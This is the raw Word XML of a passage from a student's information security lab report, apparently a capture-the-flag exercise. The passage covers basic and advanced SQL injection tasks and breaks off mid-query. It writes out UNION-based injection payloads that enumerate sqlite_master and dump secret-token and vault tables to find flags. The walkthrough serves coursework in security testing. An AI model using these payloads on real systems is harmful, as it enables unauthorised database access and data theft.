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8F82" w14:textId="357B73B2" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A" w:rsidP="0035023A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Security A-03 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0CBEF" w14:textId="7DB54468" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tauha Imran 22i-1239 cs-g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F0DEA" w14:textId="77777777" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs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  <w:id w:val="914981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06415" w14:textId="65F5BFC2" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE476B">
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="09C314F5" w14:textId="10FD35F1" w:rsidR="00FE69C9" w:rsidRDefault="00350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476B">
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00CE476B">
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00CE476B">
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc215147288" w:history="1">
            <w:r w:rsidR="00FE69C9" w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>01 SQL Injection – Basic</w:t>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215147288 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C07B1A1" w14:textId="0ECD708D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89" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>02 SQL Injection – Adva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30EC" w14:textId="58CC62D8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0" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>03 SQLi blind - It's a blind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B9DB" w14:textId="6AB77D3B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1" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>04 Cross-Site Scripting (XS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E499" w14:textId="3469BE1D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2" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05 CSRF Task –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737C" w14:textId="744CB7FF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3" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>06 Bonus Task – STEG (Sten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B13" w14:textId="164234D7" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
          <w:pPr>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE476B">
            <w:rPr>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5E183C96" w14:textId="104C91EC" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486D390" w14:textId="77777777" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1490CFC3" w14:textId="3200D6AD" w:rsidR="00637DCA" w:rsidRDefault="0035023A" w:rsidP="0035023A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc215147288"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">01 SQL Injection </w:t>
      </w:r>
      <w:r w:rsidR="00637DCA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Basic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="68AD0839" w14:textId="06CA28ED" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A" w:rsidP="00637DCA">
      <w:r w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> Exploit a basic SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8EADC3" w14:textId="77777777" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B8319B" w14:textId="603453FF" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Testing basic </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>query ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> got basic table and user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06C783" w14:textId="2B088AD9" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>query: %</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A1A55" w14:textId="77777777" w:rsidR="0063785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9909861" wp14:editId="1BB748A7">
            <wp:extent cx="5411349" cy="3040083"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="81299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3" cy="30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4538" w14:textId="6E3FC63A" w:rsidR="0063785B" w:rsidRPr="00CE476B" w:rsidRDefault="00C93184">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="0063785B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>uery: %' UNION SELECT 1,2,3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F57B43" w14:textId="2B4A6731" w:rsidR="0063785B" w:rsidRPr="00CE476B" w:rsidRDefault="006378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60659F1C" wp14:editId="239EBCA2">
            <wp:extent cx="5403273" cy="3035547"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="19982819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195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3" cy="30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CF28" w14:textId="5BDD9D93" w:rsidR="0063785B" w:rsidRPr="00CE476B" w:rsidRDefault="0063785B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C700691" w14:textId="431D5E41" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B6C28C" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>This way I can tell that this is injectable because results are showing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED0E5B" w14:textId="77777777" w:rsidR="00455D3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555736AB" wp14:editId="30E03003">
            <wp:extent cx="5284519" cy="2968831"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1882154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39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61F8" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2B0640" w14:textId="164DF816" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Getting all the table names to find the flag</w:t>
      </w:r>
      <w:r w:rsidR="00D71DC9" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">uery: </w:t>
      </w:r>
      <w:r w:rsidR="00587E9F" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>%’</w:t>
      </w:r>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT name,1,1 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE type='table' --</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128E2D00" wp14:editId="50173EFA">
            <wp:extent cx="5260769" cy="2955488"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1110894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5" cy="29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DF18" w14:textId="769FCB34" w:rsidR="00FE1B27" w:rsidRPr="00CE476B" w:rsidRDefault="00FE1B27">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">And I found </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>a ”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>player</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>” table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D911683" w14:textId="654E63D4" w:rsidR="00FE1B27" w:rsidRPr="00CE476B" w:rsidRDefault="00FE1B27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0B58A0B9" wp14:editId="64316A2F">
            <wp:extent cx="5943600" cy="1235710"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1463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431" w14:textId="77777777" w:rsidR="002B23A0" w:rsidRPr="00CE476B" w:rsidRDefault="002B23A0">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55656DA4" w14:textId="45C75A94" w:rsidR="002B23A0" w:rsidRPr="00CE476B" w:rsidRDefault="002B23A0">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Getting data from that “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>player_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>” table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">query: </w:t>
      </w:r>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">%'UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>secret_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>reward_points</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, 0 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>player_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A49F4" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69353865" w14:textId="6D3B489F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89DBC68" wp14:editId="0227579A">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74542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76B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Found the flags now submitting and seeing which one works!</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9037" w:type="dxa"/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7"/>
        <w:gridCol w:w="1840"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="00CE476B" w14:paraId="23BF79ED" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:trPr>
          <w:trHeight w:val="763"/>
        </w:trPr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4279E" w14:textId="72893769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90BBD3" w14:textId="78B4369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Correct?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="00CE476B" w14:paraId="10E7501D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02CB3" w14:textId="423B77CA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This_is_not_the_flag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FB8AE" w14:textId="6563AD84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2118C2B7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5387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44E083" w14:textId="78753C80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03CA99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29B61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3FBB37" w14:textId="5527E6E3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694F8F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658EC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243FE9" w14:textId="5491C7D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753468B6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373509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Hello_world_to_SQLi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FA693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999</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="00CE476B" w14:paraId="18B39259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1F2B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EA6121" w14:textId="493167A2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YESSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CDD5865" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRPr="00CE476B" w:rsidRDefault="006A49F4">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460A8206" w14:textId="4A9361FD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323071F" wp14:editId="15C4DDCE">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2206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3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BD8" w14:textId="77777777" w:rsidR="005C338D" w:rsidRPr="00CE476B" w:rsidRDefault="005C338D">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63005493" w14:textId="1EB97308" w:rsidR="005C338D" w:rsidRPr="00CE476B" w:rsidRDefault="005C338D">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8840AE" w14:textId="2055F49B" w:rsidR="00637DCA" w:rsidRDefault="005C338D" w:rsidP="00C3324B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc215147289"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00C3324B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection – Advance </w:t>
      </w:r>
      <w:r w:rsidR="00637DCA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5701EC6F" w14:textId="25262735" w:rsidR="005C338D" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B" w:rsidP="00637DCA">
      <w:r w:rsidRPr="00CE476B">
        <w:t>Exploit a bit advanced SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA3F77" w14:textId="3BE376EB" w:rsidR="00C3324B" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B" w:rsidP="00C3324B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383E9BF5" w14:textId="7341CD1A" w:rsidR="00C3324B" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B" w:rsidP="00C3324B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> with a basic query to see what we can find</w:t>
      </w:r>
      <w:r w:rsidR="00453893" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>query: %</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7EB566" w14:textId="3692C6FA" w:rsidR="005C338D" w:rsidRPr="00CE476B" w:rsidRDefault="0045389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7E83EBC" wp14:editId="63BB8AEF">
            <wp:extent cx="5197642" cy="2926450"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="11459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2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285" cy="2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65D" w14:textId="77777777" w:rsidR="00453893" w:rsidRPr="00CE476B" w:rsidRDefault="00453893">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F9DBEC" w14:textId="4BE32557" w:rsidR="00C3324B" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>now further exploring the columns</w:t>
      </w:r>
      <w:r w:rsidR="00453893" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>query: %' UNION SELECT 'a','b',1,'c' ORDER by budget --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF7548" w14:textId="155360FD" w:rsidR="00C3324B" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324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3ABC84BB" wp14:editId="51611172">
            <wp:extent cx="5094514" cy="2864030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85372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1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978" cy="28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41B" w14:textId="382EB918" w:rsidR="00E06A21" w:rsidRPr="00CE476B" w:rsidRDefault="00E06A21">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Now getting the table names</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">query:  %' UNION SELECT name, 'x', 1, 'x' FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B22E4E" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC4D07" w14:textId="18393CC2" w:rsidR="00B22E4E" w:rsidRPr="00CE476B" w:rsidRDefault="00B22E4E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Found a table named “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>” ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> I think</w:t>
      </w:r>
      <w:r w:rsidR="009A3845" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> might be there </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756FDD45" w14:textId="781FACAD" w:rsidR="00E06A21" w:rsidRPr="00CE476B" w:rsidRDefault="00E06A21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72306EAB" wp14:editId="1BAC5AF7">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2219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7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75F" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB6BE9E" w14:textId="51453753" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>And using the hints got this from “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">” table by accessing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>encrypted_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292273CE" w14:textId="3C0C6E4A" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">query: %' UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>encrypted_data,'b','c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
